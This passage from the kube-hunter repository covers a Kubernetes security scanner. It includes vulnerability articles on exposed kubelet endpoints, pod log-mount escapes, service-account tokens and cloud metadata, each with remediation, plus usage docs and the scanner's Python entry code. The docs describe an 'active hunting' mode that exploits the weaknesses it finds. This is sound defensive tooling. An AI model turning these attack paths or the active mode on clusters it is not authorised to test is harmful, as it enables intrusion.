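34 |   seLinux:
35 |     rule: RunAsAny
36 |   runAsUser:
37 |     rule: RunAsAny
38 |   fsGroup:
39 |     rule: RunAsAny
40 |   supplementalGroups:
41 |     rule: RunAsAny
42 | ~~~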
--------------------------------------------------------------------------------
/docs/_kb/KHV045.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV045
3 | title: Exposed System Logs
4 | categories: [Information Disclosure]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | The kubelet is leaking system logs via the `/logs` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
13 |
14 | ## Remediation
15 |
16 | Disable the kubelet's debug handlers by setting the `--enable-debugging-handlers=false` kubelet flag.
17 |
18 | ## References
19 |
20 | - [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
21 | - [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)
22 |
--------------------------------------------------------------------------------
/docs/_kb/KHV046.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV046
3 | title: Exposed Kubelet Cmdline
4 | categories: [Information Disclosure]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | When the kubelet is run in debug mode, a Pod running in the cluster is able to access the kubelet's `debug/pprof/cmdline` endpoint and examine how the kubelet was executed on the node, specifically which command line flags were used. This tells an attacker what capabilities the kubelet has that might be exploited.
13 |
14 | ## Remediation
15 |
16 | Disable the kubelet's debug handlers by setting the `--enable-debugging-handlers=false` kubelet flag.
17 |
18 | ## References
19 |
20 | - [cmdline handler in Kubelet code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go#L327)
21 | - [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)
22 |
--------------------------------------------------------------------------------
/docs/_kb/KHV047.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV047
3 | title: Pod With Mount To /var/log
4 | categories: [Privilege Escalation]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Kubernetes uses `/var/log/pods` on nodes to store Pod log files. When `kubectl logs` is run, the kubelet fetches the pod logs from that directory. If a container has write access to `/var/log`, it can create arbitrary files or symlink to other files on the host; those would then be read by the kubelet when a user executes `kubectl logs`.
13 |
14 | ## Remediation
15 |
16 | Consider disallowing running as root:
17 | Use Kubernetes Pod Security Policies with the `MustRunAsNonRoot` policy.
18 | Aqua users can use a Runtime Policy with `Blacklisted OS Users and Groups`.
19 | 
20 | Consider disallowing writable host mounts to `/var/log`:
21 | Use Kubernetes Pod Security Policies with the `AllowedHostPaths` policy.
22 | Aqua users can use a Runtime Policy with `Volume Blacklist`. (A combined Pod Security Policy sketch appears below.)
23 |
24 | ## References
25 |
26 | - [Kubernetes Pod Escape Using Log Mounts](https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts)
27 | - [Pod Security Policies - Volumes and file systems](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#volumes-and-file-systems)
28 | - [Pod Security Policies - Users and groups](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#users-and-groups)
29 |
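30 | A sketch combining both Pod Security Policy remediations above (the policy name is illustrative; the trailing fields are required boilerplate):
31 | 
32 | ~~~
33 | apiVersion: policy/v1beta1
34 | kind: PodSecurityPolicy
35 | metadata:
36 |   name: restrict-var-log     # illustrative name
37 | spec:
38 |   runAsUser:
39 |     rule: MustRunAsNonRoot   # disallow running as root
40 |   allowedHostPaths:
41 |     - pathPrefix: "/var/log" # host mounts of /var/log must be read-only
42 |       readOnly: true
43 |   seLinux:
44 |     rule: RunAsAny
45 |   fsGroup:
46 |     rule: RunAsAny
47 |   supplementalGroups:
48 |     rule: RunAsAny
49 | ~~~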
--------------------------------------------------------------------------------
/docs/_kb/KHV049.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV049
3 | title: kubectl proxy Exposed
4 | categories: [Information Disclosure]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | An open kubectl proxy was detected. `kubectl proxy` is a convenient tool for connecting from a local machine to an application running in Kubernetes, or to the Kubernetes API; it is common practice to use it to browse, for example, the Kubernetes Dashboard. Leaving a proxy open can be exploited by an attacker to gain access to your entire cluster.
13 |
14 | ## Remediation
15 |
16 | Expose your applications in a permanent, legitimate way, such as via Ingress (see the sketch below).
17 |
18 | Close open proxies immediately after use.
19 |
20 | ## References
21 |
22 | - [Accessing Clusters - Using kubectl proxy](https://kubernetes.io/docs/tasks/access-application-cluster/access-cluster/#using-kubectl-proxy)
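23 | 
24 | As a sketch of the Ingress-based remediation above (all names and the host are illustrative):
25 | 
26 | ~~~
27 | apiVersion: networking.k8s.io/v1
28 | kind: Ingress
29 | metadata:
30 |   name: my-app               # illustrative
31 | spec:
32 |   rules:
33 |     - host: app.example.com  # illustrative host
34 |       http:
35 |         paths:
36 |           - path: /
37 |             pathType: Prefix
38 |             backend:
39 |               service:
40 |                 name: my-app   # illustrative Service name
41 |                 port:
42 |                   number: 80
43 | ~~~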
--------------------------------------------------------------------------------
/docs/_kb/KHV050.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV050
3 | title: Read access to Pod service account token
4 | categories: [Access Risk]
5 | severity: medium
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Every Pod in Kubernetes is associated with a Service Account, which by default has access to the Kubernetes API. Kubernetes makes this access available through an auto-generated token mounted into the Pod. An attacker with access to a Pod can read the token and access the Kubernetes API.
13 |
14 | ## Remediation
15 |
16 | It is recommended to explicitly specify a Service Account for all of your workloads (`serviceAccountName` in `Pod.Spec`), and manage their permissions according to the least privilege principle.
17 |
18 | Consider opting out of automatic mounting of the SA token by setting `automountServiceAccountToken: false` on the `ServiceAccount` resource or in `Pod.spec` (sketched below).
19 |
20 |
21 | ## References
22 |
23 | - [Configure Service Accounts for Pods](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/)
24 |
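25 | A minimal sketch of opting out of token auto-mounting at the Pod level (the names and image are illustrative):
26 | 
27 | ~~~
28 | apiVersion: v1
29 | kind: Pod
30 | metadata:
31 |   name: no-token-pod               # illustrative
32 | spec:
33 |   serviceAccountName: limited-sa   # illustrative least-privilege account
34 |   automountServiceAccountToken: false
35 |   containers:
36 |     - name: app
37 |       image: example/app:latest    # illustrative
38 | ~~~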
--------------------------------------------------------------------------------
/docs/_kb/KHV051.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV051
3 | title: Exposed Existing Privileged Containers Via Secure Kubelet Port
4 | categories: [Access Risk]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | The kubelet is configured to allow anonymous (unauthenticated) requests to its HTTPS API. This may expose certain information and capabilities to an attacker with access to the kubelet API.
13 |
14 | A privileged container is given access to all devices on the host and can work at the kernel level. It is declared using the `Pod.spec.containers[].securityContext.privileged` attribute. This may be useful for infrastructure containers that perform setup work on the host, but is a dangerous attack vector.
15 |
16 | Furthermore, if the kubelet **and** the API server authentication mechanisms are (mis)configured such that anonymous requests can execute commands via the API within containers (specifically privileged ones), a malicious actor can leverage these capabilities to do far more damage in the cluster than expected, e.g. starting or modifying processes on the host.
17 |
18 | ## Remediation
19 |
20 | Ensure the kubelet is protected using the `--anonymous-auth=false` kubelet flag. Allow only legitimate users using the `--client-ca-file` or `--authentication-token-webhook` kubelet flags (see the sketch below). This is usually done by the installer or cloud provider.
21 | 
22 | Minimize the use of privileged containers.
23 | 
24 | Use Pod Security Policies to enforce a `privileged: false` policy.
25 | 
26 | Review the RBAC permissions to the Kubernetes API server for the anonymous and default service accounts, including bindings.
27 | 
28 | Ensure nodes run active filesystem monitoring.
29 | 
30 | Set `--insecure-port=0` and remove `--insecure-bind-address=0.0.0.0` in the Kubernetes API server config.
31 | 
32 | Remove `AlwaysAllow` from `--authorization-mode` in the Kubernetes API server config. Alternatively, set `--anonymous-auth=false` in the Kubernetes API server config; which option applies will depend on the API server version running.
33 |
34 | ## References
35 |
36 | - [Kubelet authentication/authorization](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/)
37 | - [Privileged mode for pod containers](https://kubernetes.io/docs/concepts/workloads/pods/pod/#privileged-mode-for-pod-containers)
38 | - [Pod Security Policies - Privileged](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privileged)
39 | - [Using RBAC Authorization](https://kubernetes.io/docs/reference/access-authn-authz/rbac/)
40 | - [KHV005 - Access to Kubernetes API]({{ site.baseurl }}{% link _kb/KHV005.md %})
41 | - [KHV036 - Anonymous Authentication]({{ site.baseurl }}{% link _kb/KHV036.md %})
42 |
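43 | The kubelet-side remediation above, sketched as a kubelet configuration file (assuming the `kubelet.config.k8s.io/v1beta1` API; the CA path is illustrative):
44 | 
45 | ~~~
46 | apiVersion: kubelet.config.k8s.io/v1beta1
47 | kind: KubeletConfiguration
48 | authentication:
49 |   anonymous:
50 |     enabled: false                            # --anonymous-auth=false
51 |   x509:
52 |     clientCAFile: /etc/kubernetes/pki/ca.crt  # --client-ca-file (illustrative path)
53 | authorization:
54 |   mode: Webhook                               # delegate authorization to the API server
55 | ~~~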
--------------------------------------------------------------------------------
/docs/_kb/KHV052.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV052
3 | title: Exposed Pods
4 | categories: [Information Disclosure]
5 | severity: medium
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | An attacker could view sensitive information about pods that are bound to a node using the exposed `/pods` endpoint.
13 | This can be done either by accessing the read-only port (default 10255) or the secure kubelet port (10250).
14 |
15 | ## Remediation
16 |
17 | Ensure the kubelet is protected using the `--anonymous-auth=false` kubelet flag. Allow only legitimate users using the `--client-ca-file` or `--authentication-token-webhook` kubelet flags. This is usually done by the installer or cloud provider.
18 | 
19 | Disable the read-only port by using the `--read-only-port=0` kubelet flag (see the sketch below).
20 |
21 | ## References
22 |
23 | - [Kubelet configuration](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/)
24 | - [Kubelet authentication/authorization](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/)
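25 | 
26 | The same remediation sketched as a kubelet configuration file (assuming the `kubelet.config.k8s.io/v1beta1` API):
27 | 
28 | ~~~
29 | apiVersion: kubelet.config.k8s.io/v1beta1
30 | kind: KubeletConfiguration
31 | authentication:
32 |   anonymous:
33 |     enabled: false   # --anonymous-auth=false
34 | readOnlyPort: 0      # --read-only-port=0, disables the read-only port (default 10255)
35 | ~~~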
--------------------------------------------------------------------------------
/docs/_kb/KHV053.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV053
3 | title: AWS Metadata Exposure
4 | categories: [Information Disclosure]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | AWS EC2 provides an internal HTTP endpoint that exposes information from the cloud platform to workloads running in an instance. The endpoint is accessible to every workload running in the instance. An attacker that is able to execute a pod in the cluster may be able to query the metadata service and discover additional information about the environment.
13 |
14 | ## Remediation
15 |
16 | * Limit access to the instance metadata service. Consider using a local firewall such as `iptables` to disable access from some or all processes/users to the instance metadata service.
17 |
18 | * Disable the metadata service (via instance metadata options or IAM), or at a minimum enforce the use of IMDSv2 on an instance to require token-based access to the service.
19 |
20 | * Modify the HTTP PUT response hop limit on the instance to 1. This will only allow access to the service from the instance itself rather than from within a pod.
21 |
22 | ## References
23 |
24 | - [AWS Instance Metadata service](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-retrieval.html)
25 | - [EC2 Instance Profiles](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html)
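26 | 
27 | One way to sketch the first remediation in Kubernetes terms is an egress NetworkPolicy that blocks the metadata address (names are illustrative; enforcement requires a CNI plugin that supports NetworkPolicy):
28 | 
29 | ~~~
30 | apiVersion: networking.k8s.io/v1
31 | kind: NetworkPolicy
32 | metadata:
33 |   name: deny-instance-metadata   # illustrative
34 | spec:
35 |   podSelector: {}                # applies to all pods in the namespace
36 |   policyTypes: ["Egress"]
37 |   egress:
38 |     - to:
39 |         - ipBlock:
40 |             cidr: 0.0.0.0/0
41 |             except:
42 |               - 169.254.169.254/32   # AWS instance metadata endpoint
43 | ~~~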
--------------------------------------------------------------------------------
/docs/_layouts/default.html:
--------------------------------------------------------------------------------
8 | {% seo %}
25 | {{ site.description | default: site.github.project_tagline }}
27 | {% if site.github.is_project_page %}
28 | View the Project on GitHub {{ site.github.repository_nwo }}
29 | {% endif %}
31 | {% if site.github.is_user_page %}
32 | View My GitHub Profile
33 | {% endif %}
35 | {% if site.show_downloads %}
41 | {% endif %}
46 | Lookup Vulnerability
48 | Find
57 | {{ content }}
91 | {% if site.google_analytics %}
100 | {% endif %}
--------------------------------------------------------------------------------
/docs/index.md:
--------------------------------------------------------------------------------
1 | ---
2 | ---
3 | # Welcome to kube-hunter documentation
4 |
5 | ## Documentation for vulnerabilities
6 |
7 | For information about a specific vulnerability reported by kube-hunter, enter its 'VID' (e.g. KHV004) in the search box on the left to get to the vulnerability article.
8 |
9 | For a complete list of all documented vulnerabilities, [click here]({{ site.baseurl }}{% link kbindex.html %})
10 |
11 | ## Getting started
12 |
13 | ### Where should I run kube-hunter?
14 | Run kube-hunter on any machine (including your laptop), select Remote scanning, and give the IP address or domain name of your Kubernetes cluster. This will give you an attacker's-eye view of your Kubernetes setup.
15 |
16 | You can run kube-hunter directly on a machine in the cluster, and select the option to probe all the local network interfaces.
17 |
18 | You can also run kube-hunter in a pod within the cluster. This gives an indication of how exposed your cluster would be in the event that one of your application pods is compromised (through a software vulnerability, for example).
19 |
20 | ### Scanning options
21 |
22 | By default, kube-hunter will open an interactive session, in which you will be able to select one of the following scan options. You can also specify the scan option manually from the command line. These are your options:
23 |
24 | 1. **Remote scanning**
25 | To specify remote machines for hunting, select option 1 or use the `--remote` option. Example:
26 | `./kube-hunter.py --remote some.node.com`
27 |
28 | 2. **Interface scanning**
29 | To specify interface scanning, use the `--interface` option (this will scan all of the machine's network interfaces). Example:
30 | `./kube-hunter.py --interface`
31 |
32 | 3. **Network scanning**
33 | To specify a specific CIDR to scan, use the `--cidr` option. Example:
34 | `./kube-hunter.py --cidr 192.168.0.0/24`
35 |
36 | ### Active Hunting
37 |
38 | Active hunting is an option in which kube-hunter will exploit vulnerabilities it finds, in order to explore for further vulnerabilities.
39 | The main difference between normal and active hunting is that a normal hunt will never change the state of the cluster, while active hunting can potentially perform state-changing operations on the cluster, **which could be harmful**.
40 |
41 | By default, kube-hunter does not do active hunting. To actively hunt a cluster, use the `--active` flag. Example:
42 | `./kube-hunter.py --remote some.domain.com --active`
43 |
44 | ### List of tests
45 | You can see the list of tests with the `--list` option. Example:
46 | `./kube-hunter.py --list`
47 |
48 | To see active hunting tests as well as passive:
49 | `./kube-hunter.py --list --active`
50 |
51 | ### Nodes Mapping
52 | To see only a mapping of your nodes network, run with `--mapping` option. Example:
53 | `./kube-hunter.py --cidr 192.168.0.0/24 --mapping`
54 | This will output all the Kubernetes nodes kube-hunter has found.
55 |
56 | ### Output
57 | To control logging, you can specify a log level, using the `--log` option. Example:
58 | `./kube-hunter.py --active --log WARNING`
59 | Available log levels are:
60 |
61 | * DEBUG
62 | * INFO (default)
63 | * WARNING
64 |
65 | ### Dispatching
66 | By default, the report will be dispatched to `stdout`, but you can specify different methods by using the `--dispatch` option. Example:
67 | `./kube-hunter.py --report json --dispatch http`
68 | Available dispatch methods are:
69 |
70 | * stdout (default)
71 | * http (to configure, set the following environment variables):
72 | * KUBEHUNTER_HTTP_DISPATCH_URL (defaults to: https://localhost)
73 | * KUBEHUNTER_HTTP_DISPATCH_METHOD (defaults to: POST)
74 |
75 | ## Deployment
76 | There are three methods for deploying kube-hunter:
77 |
78 | ### On Machine
79 |
80 | You can run the kube-hunter python code directly on your machine.
81 | #### Prerequisites
82 |
83 | You will need the following installed:
84 | * python 3.x
85 | * pip
86 |
87 | Clone the repository:
88 | ~~~
89 | git clone https://github.com/aquasecurity/kube-hunter.git
90 | ~~~
91 |
92 | Install module dependencies:
93 | ~~~
94 | cd ./kube-hunter
95 | pip install -r requirements.txt
96 | ~~~
97 |
98 | Run:
99 | `./kube-hunter.py`
100 |
101 | _If you want to use pyinstaller/py2exe, you need to first run the `install_imports.py` script._
102 | ### Container
103 | Aqua Security maintains a containerised version of kube-hunter at `aquasec/kube-hunter`. This container includes this source code, plus an additional (closed source) reporting plugin for uploading results into a report that can be viewed at [kube-hunter.aquasec.com](https://kube-hunter.aquasec.com). Please note that running the `aquasec/kube-hunter` container and uploading reports data are subject to additional [terms and conditions](https://kube-hunter.aquasec.com/eula.html).
104 |
105 | The Dockerfile in this repository allows you to build a containerised version without the reporting plugin.
106 |
107 | If you run the kube-hunter container with the host network it will be able to probe all the interfaces on the host:
108 |
109 | `docker run -it --rm --network host aquasec/kube-hunter`
110 |
111 | _Note for Docker for Mac/Windows:_ Be aware that the "host" for Docker for Mac or Windows is the VM which Docker runs containers within. Therefore specifying `--network host` allows kube-hunter access to the network interfaces of that VM, rather than those of your machine.
112 | By default kube-hunter runs in interactive mode. You can also specify the scanning option with the parameters described above, e.g.
113 |
114 | `docker run --rm aquasec/kube-hunter --cidr 192.168.0.0/24`
115 |
116 | ### Pod
117 | This option lets you explore what a malicious container can do or discover on your cluster. This gives a perspective on what an attacker could do if they were able to compromise a pod, perhaps through a software vulnerability. This may reveal significantly more vulnerabilities.
118 |
119 | The `job.yaml` file defines a Job that will run kube-hunter in a pod, using default Kubernetes pod access settings.
120 | * Run the job with `kubectl create` with that yaml file.
121 | * Find the pod name with `kubectl describe job kube-hunter`
122 | * View the test results with `kubectl logs <pod name>`
123 |
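124 | As a sketch, the Job manifest can be combined with the dispatch settings described above to send a JSON report over HTTP (the URL is illustrative; see `job.yaml` in the repository root for the canonical manifest):
125 | 
126 | ~~~
127 | apiVersion: batch/v1
128 | kind: Job
129 | metadata:
130 |   name: kube-hunter
131 | spec:
132 |   template:
133 |     spec:
134 |       containers:
135 |         - name: kube-hunter
136 |           image: aquasec/kube-hunter
137 |           command: ["kube-hunter"]
138 |           args: ["--pod", "--report", "json", "--dispatch", "http"]
139 |           env:
140 |             - name: KUBEHUNTER_HTTP_DISPATCH_URL
141 |               value: "https://results.example.com/report"   # illustrative endpoint
142 |             - name: KUBEHUNTER_HTTP_DISPATCH_METHOD
143 |               value: "POST"
144 |       restartPolicy: Never
145 | ~~~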
--------------------------------------------------------------------------------
/docs/kbindex.html:
--------------------------------------------------------------------------------
1 | ---
2 | ---
3 |
4 | All articles
5 |
6 | {% for article in site.kb %}
12 | {% endfor %}
13 |
--------------------------------------------------------------------------------
/job.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | apiVersion: batch/v1
3 | kind: Job
4 | metadata:
5 | name: kube-hunter
6 | spec:
7 | template:
8 | metadata:
9 | labels:
10 | app: kube-hunter
11 | spec:
12 | containers:
13 | - name: kube-hunter
14 | image: aquasec/kube-hunter:0.6.8
15 | command: ["kube-hunter"]
16 | args: ["--pod"]
17 | restartPolicy: Never
18 |
--------------------------------------------------------------------------------
/kube-hunter-screenshot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aquasecurity/kube-hunter/bc47f08e88ea2a5fb059bf3b8a8edb1aefb4c6cc/kube-hunter-screenshot.png
--------------------------------------------------------------------------------
/kube-hunter.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aquasecurity/kube-hunter/bc47f08e88ea2a5fb059bf3b8a8edb1aefb4c6cc/kube-hunter.png
--------------------------------------------------------------------------------
/kube-hunter.py:
--------------------------------------------------------------------------------
1 | kube_hunter/__main__.py
--------------------------------------------------------------------------------
/kube_hunter/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aquasecurity/kube-hunter/bc47f08e88ea2a5fb059bf3b8a8edb1aefb4c6cc/kube_hunter/__init__.py
--------------------------------------------------------------------------------
/kube_hunter/__main__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # flake8: noqa: E402
3 |
4 | from functools import partial
5 | import logging
6 | import threading
7 |
8 | from kube_hunter.conf import Config, set_config
9 | from kube_hunter.conf.parser import parse_args
10 | from kube_hunter.conf.logging import setup_logger
11 |
12 | from kube_hunter.plugins import initialize_plugin_manager
13 |
14 | pm = initialize_plugin_manager()
15 | # Using a plugin hook for adding arguments before parsing
16 | args = parse_args(add_args_hook=pm.hook.parser_add_arguments)
17 | config = Config(
18 | active=args.active,
19 | cidr=args.cidr,
20 | include_patched_versions=args.include_patched_versions,
21 | interface=args.interface,
22 | log_file=args.log_file,
23 | mapping=args.mapping,
24 | network_timeout=args.network_timeout,
25 | num_worker_threads=args.num_worker_threads,
26 | pod=args.pod,
27 | quick=args.quick,
28 | remote=args.remote,
29 | statistics=args.statistics,
30 | k8s_auto_discover_nodes=args.k8s_auto_discover_nodes,
31 | service_account_token=args.service_account_token,
32 | kubeconfig=args.kubeconfig,
33 | enable_cve_hunting=args.enable_cve_hunting,
34 | custom=args.custom,
35 | )
36 | setup_logger(args.log, args.log_file)
37 | set_config(config)
38 |
39 | # Running all other registered plugins before execution
40 | pm.hook.load_plugin(args=args)
41 |
42 | from kube_hunter.core.events.event_handler import handler
43 | from kube_hunter.core.events.types import HuntFinished, HuntStarted
44 | from kube_hunter.modules.discovery.hosts import RunningAsPodEvent, HostScanEvent
45 | from kube_hunter.modules.report import get_reporter, get_dispatcher
46 |
47 | logger = logging.getLogger(__name__)
48 | config.dispatcher = get_dispatcher(args.dispatch)
49 | config.reporter = get_reporter(args.report)
50 |
51 |
52 | def interactive_set_config():
53 | """Sets config manually, returns True for success"""
54 | options = [
55 | ("Remote scanning", "scans one or more specific IPs or DNS names"),
56 | ("Interface scanning", "scans subnets on all local network interfaces"),
57 | ("IP range scanning", "scans a given IP range"),
58 | ]
59 |
60 | print("Choose one of the options below:")
61 | for i, (option, explanation) in enumerate(options):
62 | print("{}. {} ({})".format(i + 1, option.ljust(20), explanation))
63 | choice = input("Your choice: ")
64 | if choice == "1":
65 | config.remote = input("Remotes (separated by a ','): ").replace(" ", "").split(",")
66 | elif choice == "2":
67 | config.interface = True
68 | elif choice == "3":
69 | config.cidr = (
70 | input("CIDR separated by a ',' (example - 192.168.0.0/16,!192.168.0.8/32,!192.168.1.0/24): ")
71 | .replace(" ", "")
72 | .split(",")
73 | )
74 | else:
75 | return False
76 | return True
77 |
78 |
79 | def list_hunters(class_names=False):
80 | print("\nPassive Hunters:\n----------------")
81 | for hunter, docs in handler.passive_hunters.items():
82 | name, doc = hunter.parse_docs(docs)
83 | if class_names:
84 | name = hunter.__name__
85 | print(f"* {name}\n {doc}\n")
86 |
87 | if config.active:
88 | print("\n\nActive Hunters:\n---------------")
89 | for hunter, docs in handler.active_hunters.items():
90 | name, doc = hunter.parse_docs(docs)
91 | if class_names:
92 | name = hunter.__name__
93 | print(f"* {name}\n {doc}\n")
94 |
95 |
96 | hunt_started_lock = threading.Lock()
97 | hunt_started = False
98 |
99 |
100 | def main():
101 | global hunt_started
102 | scan_options = [config.pod, config.cidr, config.remote, config.interface, config.k8s_auto_discover_nodes]
103 | try:
104 | if args.list:
105 | if args.raw_hunter_names:
106 | list_hunters(class_names=True)
107 | else:
108 | list_hunters()
109 | return
110 |
111 | if not any(scan_options):
112 | if not interactive_set_config():
113 | return
114 |
115 | with hunt_started_lock:
116 | hunt_started = True
117 | handler.publish_event(HuntStarted())
118 | if config.pod:
119 | handler.publish_event(RunningAsPodEvent())
120 | else:
121 | handler.publish_event(HostScanEvent())
122 |
123 | # Blocking to see discovery output
124 | handler.join()
125 | except KeyboardInterrupt:
126 | logger.debug("Kube-Hunter stopped by user")
127 | # happens when running a container without interactive option
128 | except EOFError:
129 | logger.error("\033[0;31mPlease run again with -it\033[0m")
130 | finally:
131 | hunt_started_lock.acquire()
132 | if hunt_started:
133 | hunt_started_lock.release()
134 | handler.publish_event(HuntFinished())
135 | handler.join()
136 | handler.free()
137 | logger.debug("Cleaned Queue")
138 | else:
139 | hunt_started_lock.release()
140 |
141 |
142 | if __name__ == "__main__":
143 | main()
144 |
--------------------------------------------------------------------------------
/kube_hunter/conf/__init__.py:
--------------------------------------------------------------------------------
1 | from dataclasses import dataclass, field
2 | from typing import Any, Optional
3 |
4 |
5 | def get_default_core_hunters():
6 | return ["FromPodHostDiscovery", "HostDiscovery", "PortDiscovery", "SendFullReport", "Collector", "StartedInfo"]
7 |
8 |
9 | @dataclass
10 | class Config:
11 | """Config is a configuration container.
12 | It contains the following fields:
13 | - active: Enable active hunters
14 | - cidr: Network subnets to scan
15 | - dispatcher: Dispatcher object
16 | - include_patched_versions: Don't skip patched versions when scanning
17 | - interface: Interface scanning mode
18 | - list_hunters: Print a list of existing hunters
19 | - log_level: Log level
20 | - log_file: Log File path
21 | - mapping: Report only found components
22 | - network_timeout: Timeout for network operations
23 | - num_worker_threads: Number of worker threads for the event handler (default 800)
24 | - pod: From pod scanning mode
25 | - quick: Quick scanning mode
26 | - remote: Hosts to scan
27 | - report: Output format
28 | - statistics: Include hunters statistics
29 | - enable_cve_hunting: Enable CVE hunting and show CVE results
30 | """
31 |
32 | active: bool = False
33 | cidr: Optional[str] = None
34 | dispatcher: Optional[Any] = None
35 | include_patched_versions: bool = False
36 | interface: bool = False
37 | log_file: Optional[str] = None
38 | mapping: bool = False
39 | network_timeout: float = 5.0
40 | num_worker_threads: int = 800
41 | pod: bool = False
42 | quick: bool = False
43 | remote: Optional[str] = None
44 | reporter: Optional[Any] = None
45 | statistics: bool = False
46 | k8s_auto_discover_nodes: bool = False
47 | service_account_token: Optional[str] = None
48 | kubeconfig: Optional[str] = None
49 | enable_cve_hunting: bool = False
50 | custom: Optional[list] = None
51 | raw_hunter_names: bool = False
52 | core_hunters: list = field(default_factory=get_default_core_hunters)
53 |
54 |
55 | _config: Optional[Config] = None
56 |
57 |
58 | def get_config() -> Config:
59 | if not _config:
60 | raise ValueError("Configuration is not initialized")
61 | return _config
62 |
63 |
64 | def set_config(new_config: Config) -> None:
65 | global _config
66 | _config = new_config
67 |
--------------------------------------------------------------------------------
/kube_hunter/conf/logging.py:
--------------------------------------------------------------------------------
1 | import logging
2 |
3 | DEFAULT_LEVEL = logging.INFO
4 | DEFAULT_LEVEL_NAME = logging.getLevelName(DEFAULT_LEVEL)
5 | LOG_FORMAT = "%(asctime)s %(levelname)s %(name)s %(message)s"
6 |
7 |
8 | def setup_logger(level_name, logfile):
9 | # Remove any existing handlers
10 | # Unnecessary in Python 3.8 since `logging.basicConfig` has `force` parameter
11 | for h in logging.getLogger().handlers[:]:
12 | h.close()
13 | logging.getLogger().removeHandler(h)
14 |
15 | if level_name.upper() == "NONE":
16 | logging.disable(logging.CRITICAL)
17 | else:
18 | log_level = getattr(logging, level_name.upper(), None)
19 | log_level = log_level if isinstance(log_level, int) else None
20 | if logfile is None:
21 | logging.basicConfig(level=log_level or DEFAULT_LEVEL, format=LOG_FORMAT)
22 | else:
23 | logging.basicConfig(filename=logfile, level=log_level or DEFAULT_LEVEL, format=LOG_FORMAT)
24 | if not log_level:
25 | logging.warning(f"Unknown log level '{level_name}', using {DEFAULT_LEVEL_NAME}")
26 |
--------------------------------------------------------------------------------
/kube_hunter/conf/parser.py:
--------------------------------------------------------------------------------
1 | from argparse import ArgumentParser
2 | from kube_hunter.plugins import hookimpl
3 |
4 |
5 | @hookimpl
6 | def parser_add_arguments(parser):
7 | """
8 | This is the default hook implementation for parse_add_argument
9 | Contains initialization for all default arguments
10 | """
11 | parser.add_argument(
12 | "--list",
13 | action="store_true",
14 | help="Displays all tests in kubehunter (add --active flag to see active tests)",
15 | )
16 |
17 | parser.add_argument("--interface", action="store_true", help="Set hunting on all network interfaces")
18 |
19 | parser.add_argument("--pod", action="store_true", help="Set hunter as an insider pod")
20 |
21 | parser.add_argument("--quick", action="store_true", help="Prefer quick scan (subnet 24)")
22 |
23 | parser.add_argument(
24 | "--include-patched-versions",
25 | action="store_true",
26 | help="Don't skip patched versions when scanning",
27 | )
28 |
29 | parser.add_argument(
30 | "--cidr",
31 | type=str,
32 | help="Set an IP range to scan/ignore, example: '192.168.0.0/24,!192.168.0.8/32,!192.168.0.16/32'",
33 | )
34 |
35 | parser.add_argument(
36 | "--mapping",
37 | action="store_true",
38 | help="Outputs only a mapping of the cluster's nodes",
39 | )
40 |
41 | parser.add_argument(
42 | "--remote",
43 | nargs="+",
44 | metavar="HOST",
45 | default=list(),
46 | help="One or more remote ip/dns to hunt",
47 | )
48 |
49 | parser.add_argument(
50 | "-c",
51 | "--custom",
52 | nargs="+",
53 | metavar="HUNTERS",
54 | default=list(),
55 | help="Custom hunting. Only given hunter names will register in the hunt."
56 | "for a list of options run `--list --raw-hunter-names`",
57 | )
58 |
59 | parser.add_argument(
60 | "--raw-hunter-names",
61 | action="store_true",
62 | help="Use in combination with `--list` to display hunter class names to pass for custom hunting flag",
63 | )
64 |
65 | parser.add_argument(
66 | "--k8s-auto-discover-nodes",
67 | action="store_true",
68 | help="Enables automatic detection of all nodes in a Kubernetes cluster "
69 | "by quering the Kubernetes API server. "
70 | "It supports both in-cluster config (when running as a pod), "
71 | "and a specific kubectl config file (use --kubeconfig to set this). "
